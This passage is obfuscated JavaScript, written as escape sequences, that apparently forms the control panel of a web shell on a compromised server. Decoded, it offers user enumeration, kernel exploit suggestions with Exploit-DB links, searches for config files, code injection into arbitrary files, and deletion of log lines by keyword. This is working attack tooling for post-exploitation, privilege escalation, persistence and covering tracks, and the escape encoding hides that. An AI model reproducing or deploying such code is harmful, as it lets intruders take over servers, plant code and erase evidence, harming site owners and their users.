3c\57\x74\144\x3e\x3c\x2f\x74\x72\x3e\140\x29\x3b\xa\x9\11\11\x9\x67\162\157\x75\160\x73\110\164\155\154\x20\53\x3d\40\47\74\x2f\x74\142\157\144\171\x3e\74\57\164\x61\x62\x6c\x65\76\47\x3b\12\11\x9\11\x9\143\157\156\164\x61\151\156\145\162\x2e\x69\x6e\156\x65\162\x48\124\x4d\114\40\75\x20\165\163\x65\162\x73\110\164\x6d\154\x20\53\40\147\162\157\x75\160\x73\110\x74\x6d\x6c\x3b\xa\x9\11\11\175\x20\x65\154\163\x65\x20\x7b\40\143\157\156\x74\141\x69\x6e\145\x72\x2e\151\x6e\156\145\x72\x48\124\x4d\x4c\x20\x3d\40\x27\x3c\160\76\106\141\x69\x6c\145\x64\x20\164\157\40\x6c\x6f\141\144\40\144\141\164\x61\56\74\x2f\160\x3e\47\x3b\40\175\12\x9\11\175\x2c\xa\11\11\141\163\x79\x6e\x63\40\147\x65\164\113\145\162\156\145\x6c\x49\156\146\x6f\50\51\x20\x7b\12\x9\11\x9\143\157\x6e\x73\164\40\x72\x65\163\40\x3d\x20\141\x77\x61\x69\164\x20\x74\150\x69\x73\x2e\x61\160\x69\x28\x27\x67\x65\164\x5f\x6b\x65\162\156\x65\x6c\137\151\x6e\x66\x6f\47\51\73\12\x9\11\11\x69\x66\x20\x28\x72\145\x73\40\x26\x26\40\162\x65\163\x2e\163\x74\141\164\x75\x73\40\75\75\75\40\47\163\x75\x63\143\x65\x73\x73\47\51\x20\x7b\x20\x74\150\151\x73\56\153\x65\162\156\145\154\x49\156\146\157\x20\x3d\x20\162\x65\163\73\40\143\x6f\156\163\164\x20\x6f\165\164\160\x75\164\105\x6c\40\x3d\x20\144\x6f\143\165\155\145\x6e\164\56\147\145\164\105\x6c\x65\x6d\x65\156\164\x42\x79\111\144\50\x27\x6b\x65\162\x6e\145\x6c\x2d\151\156\146\x6f\x2d\157\x75\x74\x70\x75\x74\47\51\73\40\154\145\x74\40\x6c\x69\156\153\163\110\x74\x6d\x6c\x20\x3d\40\47\47\x3b\40\x69\146\x20\x28\x72\x65\x73\x2e\144\x69\x73\164\x72\157\40\x26\x26\x20\x72\145\163\x2e\x6b\145\162\x6e\145\154\x29\40\173\40\143\157\156\x73\x74\x20\x73\145\141\162\x63\x68\x54\x65\162\x6d\x73\x20\x3d\40\x5b\x2e\56\56\156\x65\167\40\123\145\x74\50\133\x72\145\x73\56\x64\x69\163\x74\162\157\54\x20\162\x65\163\x2e\x6b\145\x72\x6e\145\154\x5d\51\x5d\x3b\x20\143\157\156\163\x74\x20\x65\x78\x70\154\x6f\151\x74\x52\x65\x73\40\75\x20\x61\167\x61\151\164\x20\x74\150\151\163\x2e\x61\x70\x69\50\47\x65\170\160\154\x6f\151\x74\137\x73\165\147\x67\x65\163\x74\145\x72\x27\54\40\x7b\40\144\x69\x73\164\162\x6f\72\40\x72\145\x73\56\x64\x69\163\x74\162\x6f\x2c\x20\x6b\x65\x72\x6e\x65\x6c\72\x20\162\x65\x73\x2e\x6b\145\x72\x6e\145\154\40\175\51\x3b\40\151\x66\x20\50\x65\x78\160\x6c\157\151\x74\x52\x65\x73\x20\46\x26\x20\x65\x78\x70\x6c\157\151\164\x52\145\x73\56\x73\164\x61\164\x75\163\40\x3d\x3d\75\40\47\x73\x75\x63\143\x65\x73\163\x27\51\x20\173\x20\x6c\151\x6e\x6b\163\110\x74\155\x6c\x20\x3d\x20\x27\x3c\x68\64\x3e\x45\x78\160\x6c\157\x69\x74\x2d\x44\102\40\x53\145\141\162\143\x68\x20\114\151\x6e\x6b\x73\x3a\x3c\x2f\x68\64\x3e\x3c\x75\154\x3e\47\x3b\40\x66\157\162\50\x63\157\x6e\x73\x74\x20\x74\145\x72\x6d\40\x69\156\40\145\x78\160\x6c\157\151\164\122\x65\x73\56\x6c\151\x6e\x6b\163\x29\x20\x7b\x20\x6c\x69\156\x6b\163\110\164\155\154\40\53\75\x20\x60\74\154\x69\x3e\x3c\141\x20\x68\x72\145\x66\x3d\x22\44\x7b\x65\x78\160\154\x6f\151\x74\x52\x65\163\x2e\x6c\x69\156\153\x73\x5b\x74\x65\162\x6d\x5d\175\42\x20\164\x61\x72\147\x65\164\x3d\x22\137\x62\154\x61\156\153\42\x20\163\164\x79\x6c\x65\x3d\x22\x63\157\154\157\162\x3a\166\141\162\x28\55\x2d\141\x63\143\145\x6e\x74\55\142\x6c\x75\145\51\73\x22\x3e\44\x7b\164\x65\162\x6d\x7d\x3c\57\141\x3e\74\x2f\x6c\151\76\x60\x3b\40\175\40\x6c\151\x6e\153\163\110\x74\155\154\40\x2b\x3d\x20\x27\74\57\x75\x6c\76\47\73\40\x7d\40\x7d\40\x6f\x75\164\x70\x75\164\x45\154\56\151\156\x6e\145\162\x48\124\x4d\x4c\40\75\40\x60\x3c\160\76\74\x73\x74\x72\157\x6e\147\76\x44\151\163\x74\x72\157\72\x3c\x2f\163\x74\162\157\x6e\x67\76\x20\44\x7b\162\145\163\x2e\144\x69\x73\x74\162\157\175\74\x62\162\x3e\x3c\x73\x74\162\157\156\147\76\x4b\x65\x72\156\x65\x6c\x3a\x3c\57\163\164\x72\x6f\156\x67\x3e\40\x24\x7b\162\145\x73\56\x6b\x65\x72\x6e\145\x6c\175\74\x62\x72\76\74\163\164\162\x6f\x6e\x67\x3e\125\156\x61\155\145\x3a\74\57\163\164\162\157\x6e\x67\x3e\40\x24\173\x72\x65\163\x2e\165\x6e\141\155\145\175\x3c\57\x70\76\44\173\154\151\x6e\x6b\x73\110\164\155\154\x7d\x60\73\40\175\xa\11\x9\x7d\54\xa\x9\11\x61\x73\171\x6e\x63\x20\x73\x65\141\x72\x63\150\x43\157\x6e\x74\x65\x6e\x74\50\x29\x20\173\12\11\x9\x9\143\x6f\x6e\x73\x74\40\160\141\164\x68\x20\x3d\x20\x64\x6f\143\x75\x6d\145\156\164\56\x67\145\164\105\x6c\x65\x6d\145\x6e\x74\x42\171\x49\144\x28\47\143\157\156\164\x65\156\164\x2d\x73\x65\x61\162\x63\150\55\160\x61\x74\150\47\x29\x2e\166\141\154\165\145\54\x20\143\157\156\x74\x65\156\164\x5f\160\141\164\x74\x65\x72\x6e\x20\x3d\40\x64\157\x63\165\x6d\x65\x6e\x74\56\x67\145\164\105\154\145\155\x65\156\164\x42\x79\111\x64\50\x27\143\x6f\x6e\164\x65\156\x74\x2d\x73\x65\141\x72\x63\150\x2d\x70\141\x74\164\x65\162\156\x27\51\56\x76\141\154\x75\x65\x2c\x20\x66\151\154\145\137\160\141\x74\x74\145\x72\x6e\40\75\40\x64\157\143\165\x6d\145\156\164\56\147\x65\164\105\154\x65\x6d\x65\x6e\164\x42\171\x49\144\x28\x27\x63\157\156\164\145\x6e\164\55\163\x65\x61\x72\x63\150\55\x66\x69\x6c\x65\x2d\x70\141\x74\x74\145\x72\x6e\x27\51\x2e\166\141\154\165\x65\54\x20\157\165\x74\160\165\x74\105\154\40\75\x20\144\157\143\x75\x6d\145\x6e\x74\56\x67\x65\164\105\x6c\x65\x6d\x65\156\x74\x42\x79\x49\x64\x28\x27\x63\157\x6e\x74\145\x6e\x74\x2d\x73\145\x61\162\143\150\x2d\x6f\165\x74\x70\165\x74\x27\51\x3b\12\11\x9\x9\x69\x66\40\50\41\160\141\164\150\x20\x7c\x7c\x20\x21\143\x6f\x6e\164\145\x6e\164\137\160\141\x74\x74\145\162\x6e\51\40\x72\x65\164\x75\x72\156\40\x74\x68\x69\x73\x2e\164\x6f\141\x73\164\50\47\x50\141\x74\150\40\x61\156\x64\40\103\x6f\156\164\x65\156\164\x20\x50\141\164\164\145\x72\x6e\40\x61\162\x65\40\162\145\161\x75\x69\x72\x65\x64\56\47\x2c\x20\47\145\x72\x72\x6f\162\47\x29\x3b\xa\x9\x9\x9\157\165\164\160\x75\164\x45\154\56\x69\x6e\156\x65\x72\x54\145\170\x74\40\x3d\x20\47\123\145\141\x72\143\x68\151\156\147\56\x2e\x2e\x27\73\40\143\x6f\156\163\x74\40\162\x65\163\x20\75\x20\x61\167\x61\151\164\x20\164\x68\151\x73\x2e\x61\x70\x69\x28\x27\163\x65\x61\x72\143\150\x5f\143\x6f\x6e\164\x65\x6e\x74\x27\x2c\x20\x7b\40\x70\141\x74\x68\x2c\x20\143\157\x6e\x74\145\x6e\x74\x5f\160\141\164\164\145\x72\156\x2c\x20\x66\151\x6c\145\137\160\141\164\x74\145\162\156\x20\x7d\x29\x3b\x20\x69\146\x28\162\x65\163\51\40\157\x75\x74\160\165\164\105\x6c\56\x69\x6e\156\145\162\110\x54\x4d\114\40\75\40\x72\145\163\56\x64\x61\164\x61\73\xa\x9\11\x7d\x2c\12\x9\x9\x61\x73\171\156\x63\x20\x67\x65\x74\x43\157\156\146\x69\x67\163\50\x29\40\x7b\xa\x9\x9\11\x63\x6f\x6e\x73\x74\40\x6f\165\x74\x70\165\x74\x45\x6c\40\x3d\x20\x64\x6f\143\165\155\145\x6e\164\x2e\147\x65\x74\x45\x6c\x65\155\x65\156\x74\102\x79\111\144\50\x27\x63\x6f\x6e\x66\151\x67\163\55\157\165\164\160\x75\x74\47\51\73\x20\x6f\x75\x74\160\x75\164\x45\x6c\56\x69\156\x6e\x65\x72\110\x54\115\114\40\x3d\40\47\74\160\x3e\123\145\x61\x72\x63\150\151\x6e\x67\x20\146\x6f\162\40\143\x6f\156\x66\151\147\x20\146\151\x6c\145\163\56\x2e\56\74\57\x70\76\x27\73\12\x9\x9\x9\143\157\156\x73\164\x20\x72\145\163\x20\75\x20\x61\x77\141\x69\164\x20\x74\150\x69\x73\x2e\x61\160\151\x28\x27\147\x65\164\x5f\x63\x6f\156\x66\151\147\163\x27\x29\73\40\x69\146\40\x28\162\x65\x73\40\x26\46\40\162\x65\x73\x2e\x73\164\x61\x74\x75\x73\x20\75\x3d\x3d\40\x27\163\x75\x63\x63\x65\x73\163\x27\51\x20\173\40\x6c\x65\164\x20\x68\x74\x6d\154\x20\75\x20\x27\x27\x3b\x20\x69\x66\x20\50\x4f\142\x6a\145\x63\164\x2e\153\145\171\x73\50\x72\145\163\x2e\x63\x6f\156\146\x69\x67\x73\x29\x2e\x6c\x65\x6e\x67\164\x68\40\76\40\x30\x29\40\x7b\40\x66\157\162\x20\50\x63\x6f\x6e\163\x74\40\x70\x61\x74\150\x20\151\156\40\x72\145\x73\56\143\157\x6e\x66\151\x67\163\x29\40\173\x20\x68\164\x6d\x6c\x20\x2b\x3d\x20\140\74\144\x69\166\40\143\x6c\x61\x73\163\x3d\x22\x63\x6f\x6e\146\x69\x67\x2d\146\157\x75\x6e\144\x22\76\x3c\144\x69\x76\40\143\154\x61\163\x73\75\x22\x63\157\156\146\151\x67\55\x66\157\165\x6e\x64\55\150\145\141\x64\x65\x72\42\x3e\44\x7b\160\x61\164\150\175\74\57\144\151\166\76\x3c\x64\x69\166\x20\143\154\141\163\163\75\x22\x63\157\x6e\x66\151\147\55\146\x6f\165\x6e\x64\55\x62\x6f\144\x79\x22\x3e\44\x7b\x72\x65\x73\x2e\x63\x6f\156\146\151\147\x73\x5b\160\x61\x74\x68\135\x7d\x3c\57\x64\151\166\x3e\x3c\x2f\x64\x69\166\76\140\x3b\x20\x7d\x20\x7d\40\x65\154\163\x65\x20\x7b\x20\x68\164\x6d\154\40\x3d\x20\47\x3c\x70\x3e\116\157\40\x63\x6f\155\x6d\x6f\156\x20\143\x6f\x6e\146\x69\147\165\x72\141\164\x69\157\x6e\x20\x66\151\154\145\x73\40\146\x6f\165\156\144\56\x3c\57\x70\76\x27\x3b\x20\175\x20\x6f\x75\x74\160\165\x74\x45\154\56\151\156\x6e\x65\x72\110\x54\115\114\40\75\x20\x68\164\x6d\x6c\x3b\x20\175\xa\11\11\x7d\54\12\11\11\x61\163\171\156\x63\40\x69\x6e\x6a\145\x63\164\103\x6f\x64\x65\50\51\x20\x7b\xa\x9\x9\11\143\x6f\156\x73\164\40\160\141\x74\150\40\75\x20\x64\x6f\x63\x75\155\x65\156\164\x2e\147\x65\164\x45\x6c\145\155\x65\156\164\x42\171\111\144\50\47\x69\156\x6a\x65\143\x74\55\x70\141\x74\150\47\x29\x2e\166\x61\x6c\x75\145\x2c\x20\x63\157\144\x65\x20\75\40\x64\157\x63\x75\x6d\x65\x6e\164\x2e\x67\145\164\x45\x6c\145\x6d\x65\x6e\x74\102\x79\x49\144\x28\x27\x69\156\152\x65\x63\x74\x2d\143\x6f\144\145\47\51\x2e\166\x61\x6c\165\x65\x2c\x20\x70\157\163\x69\x74\151\x6f\x6e\x20\75\x20\x64\157\x63\x75\x6d\145\156\x74\x2e\147\145\x74\x45\x6c\145\x6d\x65\156\x74\x42\171\x49\x64\x28\x27\151\x6e\152\x65\x63\164\55\x70\157\163\x69\164\x69\157\156\47\51\56\166\x61\x6c\x75\x65\x3b\xa\11\x9\11\151\146\40\50\41\160\x61\164\150\x20\174\174\x20\41\x63\157\144\x65\x29\x20\162\x65\164\x75\162\x6e\x20\x74\x68\x69\x73\x2e\164\157\141\163\164\x28\47\106\151\154\145\40\x70\x61\164\x68\40\x61\x6e\x64\x20\x63\x6f\x64\x65\x20\x61\x72\x65\x20\x72\x65\x71\x75\x69\x72\145\x64\x2e\47\54\40\47\x65\162\x72\157\x72\47\51\x3b\40\143\x6f\156\x73\164\x20\x63\157\156\x66\151\162\155\x65\144\40\75\x20\141\167\x61\151\164\x20\x74\x68\151\163\56\x73\x68\x6f\167\x43\157\156\146\151\x72\x6d\115\157\144\141\x6c\50\140\124\150\151\x73\x20\167\x69\x6c\154\x20\x6d\x6f\144\151\146\171\40\74\163\164\162\157\x6e\x67\76\44\x7b\x70\141\x74\150\x2e\x73\160\154\151\164\x28\47\x2f\47\51\x2e\x70\x6f\x70\x28\51\175\x3c\57\163\x74\x72\157\156\x67\x3e\x2e\x20\x41\162\x65\x20\x79\x6f\x75\40\x73\165\x72\145\77\140\x2c\x20\173\x20\x74\x79\160\145\72\x20\47\167\141\162\x6e\x69\156\147\x27\x20\175\x29\x3b\40\x69\x66\50\143\157\x6e\x66\x69\162\155\x65\x64\51\x20\x7b\40\143\157\156\163\x74\x20\162\145\163\40\75\40\x61\x77\141\151\164\40\x74\x68\151\x73\x2e\141\x70\x69\x28\47\151\x6e\152\145\x63\164\137\143\157\x64\145\x27\54\40\173\40\x70\141\x74\150\54\x20\143\x6f\144\145\54\40\x70\x6f\x73\151\164\x69\x6f\x6e\x20\175\51\73\x20\x69\146\x20\x28\162\145\x73\x29\x20\x74\x68\151\x73\56\x74\x6f\x61\x73\x74\x28\x72\x65\x73\x2e\155\145\163\x73\x61\147\x65\54\40\x72\145\163\x2e\163\x74\141\164\165\x73\51\73\x20\175\xa\x9\11\x7d\54\12\x9\x9\x61\x73\171\x6e\x63\x20\x63\154\x65\141\156\x4c\x6f\147\50\51\x20\x7b\x20\143\157\156\x73\x74\40\154\157\x67\x5f\x66\x69\x6c\x65\40\75\40\x64\x6f\x63\165\155\145\156\x74\56\x67\145\x74\x45\x6c\x65\155\x65\156\164\x42\x79\111\144\50\x27\154\x6f\x67\55\143\x6c\x65\141\x6e\145\x72\x2d\146\x69\154\x65\47\51\56\166\x61\x6c\x75\145\54\x20\153\145\171\x77\157\162\144\40\75\x20\x64\157\143\x75\x6d\x65\x6e\164\x2e\147\145\x74\105\154\x65\x6d\145\156\x74\102\x79\111\144\x28\x27\x6c\157\147\x2d\x63\154\145\x61\x6e\145\x72\x2d\153\x65\x79\167\157\162\x64\x27\x29\x2e\166\x61\154\165\x65\x3b\40\151\x66\40\50\41\x6c\x6f\147\x5f\146\x69\x6c\x65\x20\x7c\x7c\x20\41\153\145\x79\x77\x6f\162\x64\x29\x20\x72\x65\x74\165\162\x6e\40\x74\x68\x69\x73\x2e\164\157\141\163\164\50\47\114\x6f\147\40\x66\x69\154\145\x20\x61\156\144\x20\x6b\145\x79\x77\157\x72\144\40\x61\x72\145\40\162\x65\161\x75\x69\x72\145\144\56\47\54\40\x27\x65\162\x72\x6f\162\x27\51\x3b\40\143\x6f\156\163\164\x20\143\157\156\146\x69\x72\155\x65\x64\40\x3d\40\141\x77\141\151\x74\x20\x74\x68\151\163\56\x73\150\157\167\103\x6f\x6e\146\151\162\x6d\x4d\157\144\x61\x6c\50\x60\x54\150\x69\x73\40\x77\x69\x6c\x6c\x20\x70\x65\162\x6d\141\156\x65\156\x74\154\171\x20\162\145\155\157\x76\x65\40\154\151\x6e\145\x73\40\x63\157\x6e\164\141\151\156\x69\156\x67\40\x3c\163\164\162\x6f\156\x67\x3e\42\x24\173\153\x65\x79\167\157\162\144\175\x22\x3c\57\x73\164\x72\x6f\156\x67\x3e\x20\x66\162\x6f\x6d\x20\74\x73\x74\x72\157\156\x67\76\x22\44\x7b\154\x6f\x67\137\146\151\x6c\145\175\x22\x3c\57\x73\164\x72\157\156\147\76\56\x3c\142\162\76\74\142\162\76\124\x68\151\x73\40\141\x63\x74\151\x6f\x6e\x20\x63\141\x6e\x6e\x6f\164\x20\142\x65\40\165\156\144\157\156\x65\56\x20\x50\x72\x6f\143\145\x65\144\77\140\54\40\173\40\x74\x79\160\x65\72\40\x27\x64\x61\x6e\147\145\x72\x27\x2c\x20\157\153\x54\x65\x78\x74\x3a\40\x27\120\x72\157\143\145\x65\x64\47\x2c\40\143\141\156\143\x65\154\x54\145\x78\x74\72\x20\47\x43\x61\x6e\x63\145\x6c\x27\x20\x7d\51\x3b\x20\x69\146\50\x63\x6f\156\x66\151\x72\155\145\144\51\40\173\40\143\157\x6e\163\164\40\162\145\163\40\75\x20\x61\167\x61\151\164\40\x74\x68\x69\163\56\141\160\x69\x28\x27\x6c\157\147\x5f\143\154\145\x61\156\145\x72\47\54\x20\x7b\x20\154\157\x67\x5f\146\x69\154\x65\54\x20\153\145\x79\x77\157\x72\144\40\175\x29\73\40\151\146\x28\x72\x65\x73\51\40\x74\150\x69\x73\56\x74\157\x61\163\x74\x28\162\x65\163\56\155\x65\x73\x73\x61\147\145\54\x20\x72\x65\163\x2e\163\164\x61\x74\x75\x73\x29\73\40\x7d\x20\x7d\x2c\12\x9\x9\x61\163\x79\156\143\x20\x75\160\x64\x61\164\x65\114\151\x76\145\123\x74\x61\x74\163\x28\x29\x20\x7b\12\11\11\11\143\157\x6e\163\164\40\162\x65\x73\40\75\x20\141\x77\x61\151\x74\x20\x74\x68\x69\163\x2e\x61\160\151\50\x27\147\x65\x74\137\154\x69\x76\x65\137\x73\164\x61\164\163\47\x29\73\xa\11\11\11\x69\146\x20\50\x72\x65\x73\40\46\46\40\x72\145\163\56\x73\164\x61\x74\x75\x73\40\x3d\75\x3d\x20\47\x73\165\143\x63\x65\163\x73\47\x29\x20\x7b\12\x9\11\11\x9\x63\157\x6e\163\164\x20\173\40\143\160\165\x2c\x20\x72\x61\155\54\40\x64\151\x73\x6b\40\175\x20\x3d\40\162\145\x73\73\xa\x9\11\11\x9\143\157\156\163\164\x20\165\160\144\141\x74\x65\40\75\40\x28\145\154\x2c\x20\x76\x61\154\51\x20\x3d\76\x20\x7b\x20\x63\x6f\156\163\164\x20\x65\154\145\155\145\156\164\40\75\x20\x64\x6f\143\165\155\145\x6e\164\56\147\x65\164\x45\154\145\155\x65\156\x74\x42\171\111\x64\50\x65\x6c\51\x3b\x20\x69\146\x20\50\145\154\145\x6d\145\156\x74\x29\40\x65\x6c\x65\x6d\145\x6e\164\56\151\156\156\145\x72\x54\x65\170\x74\x20\75\x20\x76\141\154\x3b\x20\x7d\73\xa\x9\11\x9\x9\143\157\x6e\163\x74\x20\165\x70\x64\141\x74\x65\x42\141\162\x20\75\x20\50\145\x6c\x2c\x20\166\x61\x6c\x29\x20\75\x3e\x20\x7b\x20\143\x6f\x6e\163\164\x20\x65\154\145\x6d\145\156\x74\40\75\40\x64\157\x63\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74\x45\154\x65\x6d\x65\156\x74\102\x79\111\x64\x28\145\154\x29\x3b\x20\151\x66\40\x28\145\x6c\x65\x6d\145\156\x74\x29\40\145\x6c\x65\155\x65\x6e\164\56\x73\164\x79\154\145\x2e\x77\151\144\x74\150\40\75\x20\x60\44\173\166\141\x6c\x7d\45\140\73\40\x7d\x3b\12\11\11\x9\x9\151\146\x20\50\143\160\x75\56\x75\x73\145\x64\137\x70\x65\162\143\145\x6e\x74\40\76\40\55\x31\x29\x20\x7b\40\165\x70\144\x61\164\145\50\47\x63\x70\x75\x2d\x70\x65\x72\x63\x65\x6e\x74\x27\x2c\40\140\44\173\x63\x70\x75\x2e\x75\x73\x65\144\137\160\x65\x72\x63\x65\156\164\175\x25\140\51\73\40\165\x70\144\141\164\x65\102\x61\x72\50\47\x63\x70\x75\55\142\x61\x72\x27\x2c\x20\x63\160\165\x2e\165\163\x65\144\x5f\x70\x65\x72\143\145\x6e\164\x29\73\x20\175\40\145\154\163\x65\40\x7b\x20\165\160\x64\141\x74\145\50\x27\143\x70\x75\x2d\x70\145\162\x63\145\156\x74\x27\x2c\40\47\x4e\57\101\x27\51\73\x20\165\x70\144\x61\164\145\102\141\162\50\47\143\160\x75\55\142\141\x72\x27\x2c\40\x30\51\x3b\40\175\12\x9\x9\x9\x9\x69\146\x20\x28\x72\141\x6d\56\164\157\x74\x61\x6c\x20\x3e\40\x30\51\x20\173\40\x63\157\x6e\163\x74\x20\162\141\x6d\137\x70\145\x72\143\145\x6e\164\40\75\40\50\162\x61\x6d\x2e\165\163\x65\x64\40\x2f\x20\162\141\155\x2e\164\x6f\164\x61\x6c\40\x2a\x20\61\60\60\51\x2e\164\x6f\x46\x69\170\145\144\x28\62\51\x3b\40\165\160\144\x61\x74\x65\50\x27\x72\x61\155\x2d\160\x65\x72\143\145\x6e\164\x27\x2c\x20\x60\44\173\x72\141\155\137\160\x65\x72\143\x65\x6e\164\x7d\45\140\x29\73\x20\165\160\144\x61\164\x65\102\141\162\x28\47\162\x61\x6d\55\x62\x61\162\47\x2c\40\162\x61\155\137\x70\145\162\x63\145\156\164\51\73\40\x75\x70\x64\x61\164\x65\50\x27\162\141\155\x2d\x64\145\x74\x61\x69\x6c\x73\x27\x2c\40\x60\x24\x7b\164\150\151\x73\x2e\146\x6f\162\x6d\x61\164\x42\171\164\x65\163\x28\162\x61\x6d\56\x75\x73\145\144\x29\x7d\40\57\40\x24\173\164\150\x69\163\56\146\x6f\x72\x6d\x61\x74\x42\171\164\x65\163\x28\162\x61\155\56\x74\x6f\x74\141\154\x29\175\x60\51\x3b\x20\x7d\40\145\x6c\x73\145\40\173\40\x75\160\144\141\x74\x65\50\47\162\x61\x6d\x2d\x70\145\x72\143\145\x6e\164\47\54\40\x27\116\x2f\101\47\x29\73\40\165\160\x64\x61\164\145\102\141\162\50\x27\162\x61\155\x2d\142\x61\162\47\x2c\x20\60\x29\73\x20\x75\x70\x64\141\164\145\x28\x27\162\141\155\55\144\x65\x74\141\151\154\163\x27\54\x20\x27\x2d\55\40\57\x20\55\55\x27\x29\73\40\x7d\xa\x9\11\x9\x9\x69\146\x20\x28\144\151\163\153\x2e\x74\x6f\x74\141\x6c\40\x3e\x20\x30\51\x20\173\40\x63\157\x6e\x73\164\x20\x64\151\x73\x6b\x5f\x70\x65\162\143\x65\x6e\164\x20\75\40\x28\144\x69\x73\153\x2e\x75\x73\145\x64\x20\x2f\x20\x64\151\163\153\56\x74\x6f\x74\141\x6c\40\52\40\61\x30\x30\51\56\x74\x6f\106\151\170\145\x64\x28\62\51\73\x20\x75\160\144\141\x74\x65\x28\47\x64\x69\163\x6b\55\160\x65\162\143\x65\x6e\x74\x27\54\40\x60\44\173\x64\x69\x73\x6b\x5f\x70\145\162\143\x65\x6e\x74\175\x25\140\51\x3b\40\165\160\144\141\164\145\x42\141\x72\50\47\144\151\163\x6b\x2d\142\x61\162\47\x2c\40\x64\x69\163\153\137\x70\145\162\x63\145\x6e\x74\51\x3b\x20\x75\x70\x64\x61\164\145\x28\47\144\x69\x73\x6b\x2d\144\145\164\141\151\154\163\47\54\40\140\x24\173\164\150\151\163\x2e\146\x6f\162\155\x61\164\102\x79\x74\145\x73\50\144\x69\163\x6b\56\x75\163\145\x64\x29\175\40\57\x20\x24\173\x74\x68\151\x73\56\146\157\x72\x6d\x61\x74\102\x79\x74\145\163\x28\x64\x69\x73\x6b\56\164\157\x74\x61\154\51\175\140\51\x3b\x20\175\40\x65\x6c\163\x65\40\x7b\x20\165\x70\x64\141\164\x65\x28\47\x64\x69\163\153\x2d\x70\145\x72\x63\145\156\x74\x27\54\40\x27\x4e\57\101\x27\x29\73\x20\x75\160\x64\x61\x74\145\102\x61\x72\x28\47\144\151\163\153\x2d\x62\141\x72\x27\x2c\x20\x30\51\x3b\40\x75\160\144\x61\x74\145\x28\47\x64\x69\x73\153\x2d\144\145\164\x61\x69\154\163\47\54\x20\47\55\55\x20\x2f\40\55\55\x27\51\x3b\x20\x7d\12\11\x9\11\175\xa\x9\x9\x7d\54\12\40\40\40\40\40\x20\x20\x20\x72\145\156\x64\x65\x72\x53\171\163\111\x6e\146\157\50\151\x6e\x66\157\51\40\173\12\40\x20\40\40\x20\x20\40\x20\40\40\40\x20\143\x6f\x6e\163\x74\x20\x63\157\156\x74\141\x69\x6e\x65\x72\40\75\40\x64\157\143\x75\x6d\x65\156\x74\56\x67\x65\x74\105\x6c\145\x6d\145\x6e\164\102\171\x49\144\x28\47\x73\x79\x73\x2d\x69\156\146\157\55\143\157\156\164\141\151\x6e\145\162\47\51\x3b\xa\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\151\146\x20\50\41\x63\157\156\164\x61\151\x6e\145\162\x20\x7c\174\x20\41\151\156\146\157\51\40\162\145\164\165\x72\x6e\73\12\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\143\157\156\x74\141\x69\x6e\145\x72\56\151\x6e\156\145\x72\110\124\115\x4c\40\75\x20\117\142\x6a\x65\143\x74\56\145\156\x74\162\151\145\163\50\x69\156\x66\x6f\x29\56\x6d\x61\x70\x28\50\133\x6b\54\40\x76\135\51\40\75\x3e\40\173\12\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\40\x20\x2f\57\40\103\150\x65\x63\x6b\x20\x69\x66\40\164\x68\x65\40\153\145\x79\40\x69\163\40\47\107\x69\x74\150\x75\x62\40\x4c\151\156\153\47\x20\164\x6f\40\x61\154\154\x6f\167\40\110\124\x4d\114\x2c\x20\x6f\x74\150\x65\x72\x77\151\163\x65\40\x65\163\143\141\x70\145\40\151\164\x20\146\157\x72\40\163\145\143\165\162\x69\x74\171\xa\x20\40\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x63\157\156\x73\x74\40\166\141\154\165\x65\x20\75\40\x28\153\x20\x3d\x3d\x3d\x20\47\x47\x69\x74\150\x75\142\x20\114\x69\x6e\153\47\51\x20\x3f\x20\166\x20\72\40\x53\164\162\x69\156\x67\50\x76\40\174\174\40\47\x27\x29\x2e\162\145\x70\154\x61\x63\145\x28\57\74\x2f\147\54\x20\x22\46\154\x74\73\x22\x29\56\162\145\160\154\141\x63\145\x28\x2f\76\57\147\x2c\x20\x22\x26\x67\164\x3b\42\x29\73\12\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\162\x65\164\165\x72\x6e\40\140\x3c\x73\160\x61\x6e\76\x24\173\153\x7d\72\x3c\57\x73\160\x61\x6e\x3e\74\163\x70\141\x6e\76\x24\x7b\x76\x61\154\165\145\175\x3c\57\x73\x70\x61\156\76\140\x3b\xa\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\175\51\x2e\x6a\157\151\x6e\x28\x27\47\51\73\12\x20\40\40\x20\x20\40\x20\40\x7d\54\xa\40\40\40\40\x20\x20\40\x20\x75\x70\x64\141\x74\145\x53\171\163\x74\145\155\x49\x6e\x66\x6f\x48\x65\141\144\x65\x72\x28\x63\x6f\x6e\x74\x65\x78\x74\51\x20\x7b\12\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\143\157\x6e\163\164\x20\163\x79\163\151\x6e\x66\x6f\40\x3d\40\x63\157\156\164\x65\170\x74\x2e\x73\171\x73\x69\156\x66\x6f\40\174\174\40\173\175\73\xa\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x63\157\156\x73\x74\x20\165\x70\x64\x61\x74\x65\x20\x3d\40\x28\x69\144\x2c\40\x76\141\154\51\40\x3d\x3e\40\x7b\xa\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x63\x6f\x6e\x73\164\40\x65\154\x20\x3d\x20\144\157\x63\x75\x6d\x65\156\x74\x2e\x67\x65\164\x45\x6c\145\155\145\156\x74\x42\171\111\x64\x28\x69\144\51\x3b\xa\x20\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x69\146\x20\50\x65\154\x29\40\145\x6c\56\164\x65\170\164\x43\x6f\156\164\x65\156\x74\x20\75\40\166\141\154\40\x7c\x7c\x20\47\x2d\55\47\x3b\xa\40\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x7d\73\12\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\xa\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x2f\57\40\125\x6e\141\155\x65\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\143\x6f\x6e\163\x74\x20\x75\156\x61\x6d\x65\40\75\40\x73\171\x73\x69\x6e\x66\x6f\x5b\47\125\x6e\x61\x6d\x65\x27\135\x20\174\174\40\163\x79\x73\x69\156\x66\x6f\x5b\47\117\x53\47\x5d\x20\x7c\x7c\x20\163\x79\163\151\x6e\x66\157\133\47\117\160\x65\162\x61\x74\x69\x6e\x67\x20\x53\x79\163\x74\x65\155\x2